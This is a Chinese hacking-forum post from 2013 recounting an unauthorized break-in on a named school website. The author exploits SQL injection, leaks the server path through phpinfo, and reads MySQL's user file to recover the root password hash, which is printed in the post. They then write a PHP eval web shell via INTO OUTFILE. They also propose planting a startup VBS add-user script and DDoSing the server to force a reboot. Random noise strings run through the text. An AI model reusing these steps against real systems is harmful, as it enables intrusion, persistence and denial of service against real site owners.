第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏
3 D! d. `. v- @0 O% l N发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3 -0 -1 判断后确认存在注入!
$ d8 B& Q. m/ g8 l, }; Y E3 e! H# t/ v1 p0 x! c9 p7 Q3 D
7 O9 n! |& ^ @$ R* i
: t& H1 Z* `* F* {* [常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限
' y" _0 K! r. h2 U, S
% I! b" r0 t; J. {, R那么想可以直接写入shell ,getshell有几个条件:
1 f* p% g) k& S% b* I9 O0 E' f, c1、知道站点物理路径 2、有足够大的权限 3、magic_quotes_gpc()=OFF ! d$ ~+ U. }" e. G" [- D
5 l' Z0 V4 n, x7 p# p3 s试着爆绝对路径:
- N: `, a3 I8 S" Z# F$ e1 l w1 `& _1./phpMyAdmin/index.php?lang[]=1
" \" B, x" O. a" y2./phpMyAdmin/phpinfo.php 7 Q7 S+ a( z# f/ }& L- K( { o0 U
3./load_file()
' b. U, }1 l; M' p" T4./phpmyadmin/themes/darkblue_orange/layout.inc.php 4 K% Q% R! K5 x" K3 m' x
5./phpmyadmin/libraries/select_lang.lib.php / R8 O/ p/ W# [
6./phpmyadmin/libraries/lect_lang.lib.php
5 L u0 W) j2 K Y7./phpmyadmin/libraries/mcrypt.lib.php
) c4 q r6 e, V! O% X @- l1 _6 D8./phpmyadmin/libraries/export/xls.php
7 D5 [) `$ t' h3 u& O5 @( K; Z4 t
* d0 ?8 N/ A6 V. L均不行...........................
, Q) t1 J7 W5 N B* {7 T5 K
' b' S. I `$ z* m$ f8 M0 ^御剑扫到这个: http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php
7 K0 b- {8 H2 N3 @3 c) H/ N, p* M# v% J+ ^1 Q1 r! x* B4 ^1 |2 r
权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin
# T1 y7 b8 C5 X; X: R
* V* m( t; c7 C3 {6 |3 U默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败
6 `% G- W; t5 x0 }7 X3 w
" `' E- f2 x1 [- f( |敏感东西: http://202.103.49.66/Admincp.php 社工进不去........... ) |/ K, e' N* D5 }# x" d/ N8 L6 O
( w/ v) _) f1 }& M% a; c想想root还可以读,读到root密码进phpmyadmin 也可以拿shell
5 U7 X3 t! M& f3 N7 K+ [
1 P! J2 ^5 P5 Jhttp://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini
+ K4 g: q7 X2 y4 o" l; {
* X% z, c# X1 e" }: c c r自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD
/ Z* S7 O' ]" n: V3 t' G$ f# W! ?
0 L/ k6 D: K3 W0 z9 h成功读到root密码: 8 {5 K: Z: R1 m* x
- z9 e" U2 m+ ~% B; b& z; L. [+ {: B
17---- r(0072) " }/ Q! w6 k% F4 f4 ~
18---- o(006f)
1 O0 p! z, C6 b$ z19---- o(006f) - t* X8 j: K% j
20---- t(0074)
. t9 _ F* h$ U0 E3 T21---- *(002a) " t, Q! ^- M: x3 a6 g, I* P
22---- 8(0038) 9 i7 M; w) @& n# i0 r, g& m
23---- 2(0032) ! N. f0 J5 c4 X# [, u
24---- E(0045) ( B& l1 v. \- \3 R* {
25---- 1(0031) ( ^4 S6 p! H: }8 W/ s) C
26---- C(0043) # ^0 [* l& x7 ~( a" V
27---- 5(0035)
& Q" O) o+ i- T4 w; h$ G28---- 8(0038)
1 M4 Z6 f% S. v, l6 Q5 J29---- 2(0032) ! o/ e/ f8 a) j
30---- 8(0038) ) O- A6 j9 E+ S- V
31---- A(0041)
0 O: |/ {& ]5 i$ \32---- 9(0039) & }, ~$ t y0 z. I- s
33---- B(0042)
+ R+ m3 q, w4 o t5 {7 n2 T34---- 5(0035)
( n3 l2 C- \4 n7 C( G m% X35---- 4(0034) + c6 y+ q7 c$ E4 b
36---- 8(0038)
8 |, n# p2 d' n' w1 T37---- 6(0036) % l9 ~" k. A }) M) Y
38---- 4(0034) 4 ]' N3 U) }7 _2 z
39---- 9(0039)
8 t) j4 n; Q; h) o! x) @40---- 1(0031) A, u7 X+ e3 C' Y9 }9 X, n0 r
41---- 1(0031) ! k$ Q: h( x0 ]' `
42---- 5(0035) # G0 v1 ` N* s9 h; N8 H9 @+ u
43---- 3(0033) # f B# ^$ a, p o1 ^$ y. u
44---- 5(0035)
2 e4 a9 S9 y0 N) _6 \45---- 9(0039)
6 q1 s, r4 c% t# p% v46---- 8(0038) # ]) m- ?7 C$ X7 S7 p8 d
47---- F(0046)
% w7 w1 u/ f- ]' j* [48---- F(0046)
7 w; u9 U X% G: s' {; _% i& W7 B49---- 4(0034) * a* z# l9 r5 q$ ^$ Y/ O2 l3 H. H% I
50---- F(0046) 9 W& l' }" @! H" F n& A
51---- 0(0030)
( n, `2 H5 A1 u0 I& a3 m$ V( q% e$ s: l52---- 3(0033) - G) i6 ^8 c! ]; ]! ~; q4 g
53---- 2(0032)
# T. G1 C7 j5 `" y54---- A(0041)
. o+ _3 Y+ |( ]3 W) p1 Z; ]$ |' O55---- 4(0034)
1 n' C3 e5 L W; M5 S& M( B56---- A(0041) ' }% B) i. J" t2 N6 L
57---- B(0042) * p8 s9 I" k/ t% _. R) M
58---- *(0044)
- {0 d, r# \& a* ~! }59---- *(0035)
' Y Z( p: a, D* X! d; {60---- *(0041)
. y$ o" B0 g8 K1 E5 Y3 |& D' g61---- *0032) ; n* q0 d5 C* F2 {$ B ^, g, {
/ e% a' c; o) S' {- h, T$ X
解密后成功登陆phpmyamin
- k* Q; h7 E' O
9 x5 G/ o- ]& a" W' a& p& ~, O/ w. v2 k0 {
2 e* ^3 z/ v) p# Z2 j& B
, U5 W5 F9 `5 b* o
找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php' * }, W; U5 P: P* W! j
* I) F. L9 o3 e8 o2 o: x, F成功执行,拿下shell,菜刀连接: . E6 q5 G$ ]- Z1 _. d' O0 E
& p3 B/ c# Z' V8 D/ j' b
服务器不支持asp,aspx,php提权无果................... 8 |9 G) Q, @. T4 D4 d" X% i0 x( h4 ^, G
: g' c& F* C2 ~
但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里: , @- L p0 V5 R, y9 y" Y4 `
服务器上已经有个隐藏帐号了 6 U4 Y3 c$ ~! k, D- g
别名 administrators
5 @# R. t; P8 R g. x注释 管理员对计算机/域有不受限制的完全访问权 - u* z. s! o' W* Y1 L
成员
) P9 U2 W! W/ c( Z1 h% G" G7 M) H-------------------------------------------------------------------------------
# F1 o4 d1 q+ n, p: l/ T6 iadmin
* b: \3 v$ W+ { ^! `1 E, FAdministrator
9 k; t6 K: [" i0 R8 g1 v1 f0 ~slipper$
$ k5 @% _- \. z% L# O. Xsqluser# C3 k5 j+ x1 E! F' r! b; n
命令成功完成。
( m. m, u7 ?. u7 x* b
* t7 ?' k: B- e* f0 R服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。$ ~- l, t, k/ g) ^& f
7 N% l# L' _3 F) d/ ^6 m
ddos服务器重启,不然就只能坐等服务器重启了...............................
7 O4 m, t0 i7 ^) b/ u9 n1 @9 e' g* z
8 J/ j5 `& J% }5 W/ ^9 z
- E( s; I, z' l1 V& q* v | 
发表于 2013-1-11 21:32:15
收藏
支持
反对
发表于 2013-5-20 15:28:12
